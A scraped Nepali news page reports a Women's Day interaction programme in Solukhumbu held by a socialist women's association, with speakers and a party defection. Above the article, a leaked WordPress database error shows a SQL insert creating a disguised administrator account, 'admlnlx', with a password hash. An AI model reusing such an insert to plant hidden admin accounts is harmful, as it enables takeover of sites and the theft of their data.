WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bzc5kSIzNJg/2CIqU/pBjmr/rKbGhH0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 13:36:28', '', 'admlnlx', 'admlnlx')
सोलुखुम्बु । अखिल नेपाल महिला संघ (समाजबादि) जिल्ला कमिटि सोलुखुम्बुद्धारा १ सय १२ औँ अन्तर्राष्ट्रिय श्रमिक महिला दिवसको अवसरमा आयोजित अन्तरक्रियात्मक कार्यक्रम सम्पन्न ।
सोलुखुम्बु सदरमुकाम सल्लेरीमा आयोजित अन्तरक्रियात्मक कार्यक्रमलाई सम्बोधन गर्दै नेकपा एकिकृत समाजबादिका केन्द्रिय सदस्य तथा जिल्ला ईन्चार्ज आङङिमा लामाले महिलाहरुको हकहितको लागि आफ्नो पार्टीले शसक्त भुमिका निर्वाह गर्ने बताएका छन् ।
अखिल नेपाल महिला संघ (समाजबादि) जिल्ला कमिटि अध्यक्ष निरकुमारी राईको अध्यक्षतामा सम्पन्न कार्यक्रममा प्रगतिशिल नेपाल राष्ट्रिय शिक्षक संगठनकी केन्द्रिय सदस्य होमकुमारी खतिवडा र पार्टी जिल्ला सचिव डिल्लि राई लगायतको उपस्थिति रहेको थियो ।
सो क्रममा माप्यदुधकोशी ७ का ङवाङ नुरु शेर्पा नेकपा एमाले परित्याग गरि नेकपा एकिकृत समाजबादिमा प्रवेश गरेका छन् ।